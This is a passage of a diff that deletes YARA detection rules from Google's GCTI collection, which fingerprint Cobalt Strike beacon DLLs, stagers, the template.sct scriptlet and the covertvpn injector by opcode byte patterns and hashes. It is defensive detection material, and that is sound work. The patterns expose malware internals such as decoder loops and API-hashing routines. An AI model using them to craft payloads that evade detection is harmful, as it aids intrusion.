-                     48 8B 5C 24 30 48 83 C4 20 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_5_Hf1_And_V3_5_1
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.5-hf1 and 3.5.1"
-		author = "gssincla@google.com"
-		id = "0c0e87d3-e0e2-5ddc-9d89-5e56443da4b8"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1150-L1189"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "934134ab0ee65ec76ae98a9bb9ad0e9571d80f4bf1eb3491d58bacf06d42dc8d"
-		logic_hash = "5cd69554edb91956f4ec4c3c5e55f4cd9c3665656c318220ba3a270c0bb0a690"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 8B D3 48 8B CF E8 38 70 00 00 E9 FD FA FF FF
-                     41 B8 01 00 00 00 8B D3 48 8B CF E8 3F 4D 00 00
-                     48 8B 5C 24 30 48 83 C4 20 5F }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_6
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.6"
-		author = "gssincla@google.com"
-		id = "9651a1ca-d8ea-5b0b-bcba-a850c2e07791"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1191-L1233"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "92b0a4aec6a493bcb1b72ce04dd477fd1af5effa0b88a9d8283f26266bb019a1"
-		logic_hash = "d6aff186a01386992f004cb775d280f9b6e7e16d7ecee662d61e3485b0bc088b"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 27
-                     0F 87 47 03 00 00 0F 84 30 03 00 00 83 F9 14
-                     0F 87 A4 01 00 00 0F 84 7A 01 00 00 83 F9 0C
-                     0F 87 C8 00 00 00 0F 84 B3 00 00 00 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_7
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.7"
-		author = "gssincla@google.com"
-		id = "27fad98a-2882-5c52-af6e-c7dcf5559624"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1235-L1274"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "81296a65a24c0f6f22208b0d29e7bb803569746ce562e2fa0d623183a8bcca60"
-		logic_hash = "89499e01acd607b2fbcdd134c74ca4a901c00c7c9cf70dd241cc538c1c0d083a"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 28
-                     0F 87 7F 03 00 00 0F 84 67 03 00 00 83 F9 15
-                     0F 87 DB 01 00 00 0F 84 BF 01 00 00 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_8
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.8"
-		author = "gssincla@google.com"
-		id = "89809d81-9a8b-5cf3-a251-689bf52e98e0"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1276-L1310"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "547d44669dba97a32cb9e95cfb8d3cd278e00599e6a11080df1a9d09226f33ae"
-		logic_hash = "8845b71ce4401fd194eb88f04dbf1f313af8b4853da004e63261ca3158fcb1d4"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 8B D3 48 8B CF E8 7A 52 00 00 EB 0D 45 33 C0 8B D3 48 8B CF
-                     E8 8F 55 00 00 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_11
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.11 (two subversions)"
-		author = "gssincla@google.com"
-		id = "bf0c7661-2583-5fca-beb5-abb2b50c860d"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1312-L1366"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "64007e104dddb6b5d5153399d850f1e1f1720d222bed19a26d0b1c500a675b1a"
-		logic_hash = "9c34b23b659463a0ab92949031a9b3246aa95256d1548b2f0ad53fe3d379997d"
-		score = 75
-		quality = 85
-		tags = ""
-		rs2 = "815f313e0835e7fdf4a6d93f2774cf642012fd21ce870c48ff489555012e0047"
-
-	strings:
-		$version_sig = { 48 83 EC 20 41 8B D8 48 8B FA 83 F9 2D 0F 87 B2 03 00 00
-                     0F 84 90 03 00 00 83 F9 17 0F 87 F8 01 00 00
-                     0F 84 DC 01 00 00 83 F9 0E 0F 87 F9 00 00 00
-                     0F 84 DD 00 00 00 FF C9 0F 84 C0 00 00 00 83 E9 02
-                     0F 84 A6 00 00 00 FF C9 }
-		$decoder = {
-      80 34 28 ??
-      48 FF C0
-      48 3D 00 10 00 00
-      7C F1
-    }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_12
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.12"
-		author = "gssincla@google.com"
-		id = "6eeae9f4-96e0-5a98-a8dc-779c916cd968"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1368-L1404"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "8a28b7a7e32ace2c52c582d0076939d4f10f41f4e5fa82551e7cc8bdbcd77ebc"
-		logic_hash = "7457b20f2a7dc7e8c3317cedbcfccae30ecc8dc164188c0321f9485fdfab0f6e"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 8B D3 48 8B CF E8 F8 2E 00 00 EB 16 8B D3 48 8B CF
-                     E8 00 5C 00 00 EB 0A 8B D3 48 8B CF E8 64 4F 00 00 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_13
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.13"
-		author = "gssincla@google.com"
-		id = "202eb8ea-7afb-515b-9306-67514abf5e55"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1407-L1440"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "945e10dcd57ba23763481981c6035e0d0427f1d3ba71e75decd94b93f050538e"
-		logic_hash = "81571a6c30802430d0df9980e005736d58464bde98c0889b48bf8d0c7e88d247"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 48 8D 0D 01 5B FF FF 48 83 C4 28 E9 A8 54 FF FF 8B D0
-                     49 8B CA E8 22 55 FF FF }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_14
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.14"
-		author = "gssincla@google.com"
-		id = "d69171e3-86f4-5187-8874-5eee2045f746"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1442-L1477"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "297a8658aaa4a76599a7b79cb0da5b8aa573dd26c9e2c8f071e591200cf30c93"
-		logic_hash = "87cf465154d4294eeda9cf99c6c160da80cfa8a65244bc083737c0c87163431d"
-		score = 75
-		quality = 85
-		tags = ""
-		rs2 = "39b9040e3dcd1421a36e02df78fe031cbdd2fb1a9083260b8aedea7c2bc406bf"
-
-	strings:
-		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 B1 1F 00 00 8B D0 49 8B CA
-                     48 83 C4 28 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_X86_V4_0_Suspected
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.0 (suspected, not confirmed)"
-		author = "gssincla@google.com"
-		id = "28a735c4-87d1-5e14-9379-46a6fd0cdd2a"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1480-L1515"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "55aa2b534fcedc92bb3da54827d0daaa23ece0f02a10eb08f5b5247caaa63a73"
-		logic_hash = "0dbf6a75dc74f4c2a7604072a01e2dbaaee15f5e57c765f24138d85c248fb305"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 D1 B3 FF FF
-                     8B D0 49 8B CA 48 83 C4 28 E9 AF F5 FF FF 45 33 C0
-                     4C 8D 0D 8D 70 FF FF 8B D0 49 8B CA E8 9B B0 FF FF }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_1_And_V_4_2
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.1 and 4.2"
-		author = "gssincla@google.com"
-		id = "dc320d17-98fc-5df3-ba05-4d134129317e"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1517-L1553"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "29ec171300e8d2dad2e1ca2b77912caf0d5f9d1b633a81bb6534acb20a1574b2"
-		logic_hash = "9b262ec18f79ab5ae63ad26d3685af088b5feb2d66de6ad3ba584cafbe2ee221"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 83 F9 34 0F 87 8E 03 00 00 0F 84 7A 03 00 00 83 F9 1C 0F 87 E6 01 00 00
-                     0F 84 D7 01 00 00 83 F9 0E 0F 87 E9 00 00 00 0F 84 CE 00 00 00 FF C9
-                     0F 84 B8 00 00 00 83 E9 02 0F 84 9F 00 00 00 FF C9 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_3
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Version 4.3"
-		author = "gssincla@google.com"
-		id = "572616c7-d1ec-5aa1-b142-4f2edf73737f"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1555-L1590"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "3ac9c3525caa29981775bddec43d686c0e855271f23731c376ba48761c27fa3d"
-		logic_hash = "0c8934e997583339145749a3167ac010d8c77b2ed878d2c999de68ec2a98101d"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 D3 88 FF FF
-                     4C 8D 05 84 6E FF FF 8B D0 49 8B CA 48 83 C4 28 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_4_V_4_5_And_V4_6
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.4 through at least 4.6"
-		author = "gssincla@google.com"
-		id = "79b6bfd4-1e45-5bd9-ac5c-19eb176ce698"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1593-L1628"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "3280fec57b7ca94fd2bdb5a4ea1c7e648f565ac077152c5a81469030ccf6ab44"
-		logic_hash = "be0bbf58a176f8089924b3ce58268d906f49dde51d863524971e46f4bada43a3"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 83 88 FF FF
-                     4C 8D 05 A4 6D FF FF 8B D0 49 8B CA 48 83 C4 28 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_5_Variant
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.5 (variant)"
-		author = "gssincla@google.com"
-		id = "45715da9-8f16-5304-b216-1ca36c508c77"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1630-L1665"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "8f0da7a45945b630cd0dfb5661036e365dcdccd085bc6cff2abeec6f4c9f1035"
-		logic_hash = "31a108168489a24d1bc297d722741f3fd19abd1bed4c76d54967c73986d18123"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 E8 AB FF FF
-                     8B D0 49 8B CA E8 1A EB FF FF 48 83 C4 28 }
-		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Template_Sct_V3_3_To_V4_X
-{
-	meta:
-		description = "Cobalt Strike's resources/template.sct signature for versions v3.3 to v4.x"
-		author = "gssincla@google.com"
-		id = "9d2b1dfa-5f76-503f-9198-6ed0d039e0cb"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Sct_v3_3_to_v4_x.yara#L17-L38"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142"
-		logic_hash = "8868445ced4945c469764b7f311d6cb11c99cf0f2d770113e5e617e0187a962c"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$scriptletstart = "<scriptlet>" nocase
-		$registration = "<registration progid=" nocase
-		$classid = "classid=" nocase
-		$scriptlang = "<script language=\"vbscript\">" nocase
-		$cdata = "<![CDATA["
-		$scriptend = "</script>" nocase
-		$antiregistration = "</registration>" nocase
-		$scriptletend = "</scriptlet>"
-
-	condition:
-		all of them and @scriptletstart [ 1 ] < @registration [ 1 ] and @registration [ 1 ] < @classid [ 1 ] and @classid [ 1 ] < @scriptlang [ 1 ] and @scriptlang [ 1 ] < @cdata [ 1 ]
-}
-rule GCTI_Cobaltstrike_Resources_Covertvpn_Injector_Exe_V1_44_To_V2_0_49
-{
-	meta:
-		description = "Cobalt Strike's resources/covertvpn-injector.exe signature for version v1.44 to v2.0.49"
-		author = "gssincla@google.com"
-		id = "48485ae2-1d99-5fa8-b8e8-0047e92ef447"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_injector_Exe_v1_44_to_v2_0_49.yara#L17-L116"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "d741751520f46602f5a57d1ed49feaa5789115aeeba7fa4fc7cbb534ee335462"
-		logic_hash = "119602efe6243d8c0dc7b8f4468eb9b3be292620920f69dc8a560f900ac7f622"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$dropComponentsAndActivateDriver_prologue = {
-			C7 04 24 [4]
-			E8 [4]
-			83 EC 04
-			C7 44 24 04 [4]
-			89 04 24
-			E8 59 14 00 00
-			83 EC 08
-			89 45 ??
-			83 7D ?? 00
-			74 ??
-			E8 [4]
-			8D [2]
-			89 [3]
-			89 04 24
-		}
-		$dropFile = {
-			C7 44 24 04 00 00 00 00
-			8B [2]
-			89 ?? 24
-			E8 [4]
-			83 F8 FF
-			74 ??
-			8B [2]
-			89 ?? 24 04
-			C7 04 24 [4]
-			E8 [4]
-			E9 [4]
-			C7 44 24 18 00 00 00 00
-			C7 44 24 14 80 01 00 00
-			C7 44 24 10 02 00 00 00
-			C7 44 24 0C 00 00 00 00
-			C7 44 24 08 05 00 00 00
-			C7 44 24 04 00 00 00 40
-			8B [2]
-			89 04 24
-			E8 [4]
-			83 EC 1C
-			89 45 ??
-		}
-		$nfp = "npf.sys" nocase
-		$wpcap = "wpcap.dll" nocase
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Bind_Bin_V2_5_Through_V4_X
-{
-	meta:
-		description = "Cobalt Strike's resources/bind.bin signature for versions 2.5 to 4.x"
-		author = "gssincla@google.com"
-		id = "32f129c1-9845-5843-9e16-7d9af217b8e2"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind_Bin_v2_5_through_v4_x.yara#L17-L111"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "3727542c0e3c2bf35cacc9e023d1b2d4a1e9e86ee5c62ee5b66184f46ca126d1"
-		logic_hash = "cf04e257590cf0673059348f5c15926918eb8aee40e864ae65979360aca80013"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$apiLocator = {
-			31 ??
-			AC
-			C1 ?? 0D
-			01 ??
-			38 ??
-			75 ??
-			03 [2]
-			3B [2]
-			75 ??
-			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
-		}
-		$ws2_32 = {
-			5D
-			68 33 32 00 00
-			68 77 73 32 5F
-		}
-		$listenaccept = {
-			5?
-			5?
-			68 B7 E9 38 FF
-			FF ??
-			5?
-			5?
-			5?
-			68 74 EC 3B E1
-		}
-
-	condition:
-		$apiLocator and $ws2_32 and $listenaccept
-}
-rule GCTI_Cobaltstrike_Resources_Xor_Bin_V2_X_To_V4_X
-{
-	meta:
-		description = "Cobalt Strike's resource/xor.bin signature for version 2.x through 4.x"
-		author = "gssincla@google.com"
-		id = "1754746c-3a42-5f7d-808a-ba2e1c0a270e"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__32bit_v2_x_to_4_x.yara#L17-L36"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "211ccc5d28b480760ec997ed88ab2fbc5c19420a3d34c1df7991e65642638a6f"
-		logic_hash = "ad662a263ede6c3ba964baf8abe4848ed1e994f2c236d4315cb60c1d51442620"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$stub52 = {fc e8 ?? ?? ?? ?? [1-32] eb 27 5? 8b ??    83 c? ?4 8b ??    31 ?? 83 c? ?4 5? 8b ??    31 ?? 89 ??    31 ?? 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb ea 5? ff e? e8 d4 ff ff ff}
-		$stub56 = {fc e8 ?? ?? ?? ?? [1-32] eb 2b 5d 8b ?? ?? 83 c5 ?4 8b ?? ?? 31 ?? 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e8 5? ff e? e8 d? ff ff ff}
-
-	condition:
-		any of them
-}
-rule GCTI_Cobaltstrike_Resources_Dnsstager_Bin_V1_47_Through_V4_X
-{
-	meta:
-		description = "Cobalt Strike's resources/dnsstager.bin signature for versions 1.47 to 4.x"
-		author = "gssincla@google.com"
-		id = "e1b0e368-9bcf-5d9b-b2b3-8414742f213e"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Dnsstager_Bin_v1_47_through_v4_x.yara#L17-L78"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "10f946b88486b690305b87c14c244d7bc741015c3fef1c4625fa7f64917897f1"
-		logic_hash = "d4500d8a83a821e1df9e808b17a87c1207d78ea0e03886544a632176fe93ccd0"
-		score = 75
-		quality = 83
-		tags = ""
-
-	strings:
-		$apiLocator = {
-			31 ??
-			AC
-			C1 ?? 0D
-			01 ??
-			38 ??
-			75 ??
-			03 [2]
-			3B [2]
-			75 ??
-			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
-		}
-		$dnsapi = { 68 64 6E 73 61 }
-
-	condition:
-		$apiLocator and $dnsapi
-}
-rule GCTI_Cobaltstrike_Resources_Httpsstager_Bin_V2_5_Through_V4_X
-{
-	meta:
-		description = "Cobalt Strike's resources/httpsstager.bin signature for versions 2.5 to 4.x"
-		author = "gssincla@google.com"
-		id = "f45aa40a-3936-50f9-a60e-de7181862d19"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager_Bin_v2_5_through_v4_x.yara#L17-L95"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "5ebe813a4c899b037ac0ee0962a439833964a7459b7a70f275ac73ea475705b3"
-		logic_hash = "d2f722809a59faf8ecd85e46eadf58bf23ba5f515ad9c949843f1e6bfeec1fbf"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$apiLocator = {
-			31 ??
-			AC
-			C1 ?? 0D
-			01 ??
-			38 ??
-			75 ??
-			03 [2]
-			3B [2]
-			75 ??
-			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
-		}
-		$InternetSetOptionA = {
-			6A 04
-			5?
-			6A 1F
-			5?
-			68 75 46 9E 86
-			FF
-		}
-
-	condition:
-		$apiLocator and $InternetSetOptionA
-}
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X86_O_V4_3_V4_4_V4_5_And_V4_6
-{
-	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.HA.x86.o (HeapAlloc) Versions 4.3 through at least 4.6"
-		author = "gssincla@google.com"
-		id = "0ee3fa6f-367c-596f-a3bc-3bcfa61b97aa"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L17-L59"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "8e4a1862aa3693f0e9011ade23ad3ba036c76ae8ccfb6585dc19ceb101507dcd"
-		logic_hash = "d02257bc556d0b1675997ab6af1b28cf5f498855d6254e3c1cd7eb4a0c4d2715"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$core_sig = {
-      C6 45 F0 48
-      C6 45 F1 65
